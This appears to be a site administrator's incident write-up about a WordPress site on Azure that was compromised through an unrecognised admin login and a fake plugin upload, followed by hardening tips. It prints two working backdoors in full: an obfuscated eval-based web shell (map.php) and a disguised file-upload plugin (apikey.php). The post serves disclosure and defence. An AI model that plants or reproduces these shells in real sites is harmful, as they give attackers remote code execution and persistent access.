Malware Wordpress on Azure
Recently received a security alert on a wordpress webapp running on Azure:
1. There was a non-recognized authentication as admin user
2. The user Uploaded a .zip file to the plugins folder that contained 2 files: map.php and apikey.php
3. The user performed a "test" through the "plugin"
Example of the code map.php:
<?php $GLOBALS['_79565595_']=Array('str_' .'rot13','pack','st' .'rrev'); ?><?php function _1178619035($i){$a=Array("jweyc","aeskoly","owhggiku","callbrhy","H*");return $a[$i];} ?><?php function l__0($_0){return isset($_COOKIE[$_0])?$_COOKIE[$_0]:@$_POST[$_0];}$_1=l__0(_1178619035(0)) .l__0(_1178619035(1)) .l__0(_1178619035(2)) .l__0(_1178619035(3));if(!empty($_1)){$_1=$GLOBALS['_79565595_'][0](@$GLOBALS['_79565595_'][1](_1178619035(4),$GLOBALS['_79565595_'][2]($_1)));if(isset($_1)){@eval($_1);exit();}}
Example of code apikey.php:
<?php
/**
* @package api key
*/
/*
Plugin Name: api key
*/
if ("hello"==$_GET["test"])
{
echo "testtrue";
}
if(is_uploaded_file($_FILES["filename"]["tmp_name"]))
{
move_uploaded_file($_FILES["filename"]["tmp_name"],$_FILES["filename"]["name"]);
echo "true";
}
Image of the "Plugin" on the wordpress site:
Sucuri sent out an alert that the .zip file was uploaded to the site. At this point there is no easy way to find the affected files on a Wordpress installation even using some tools like the sucuri scanner tool online.
Recommendations:
. Enable Sucuri plugin on your WP
. Enable WAF v2 on your webapp
. If possible isolate your resource using App Service Environment
. Harden NSG(s)
. Perform a SSL Test on your web app
If you have any other tip recommendation please share!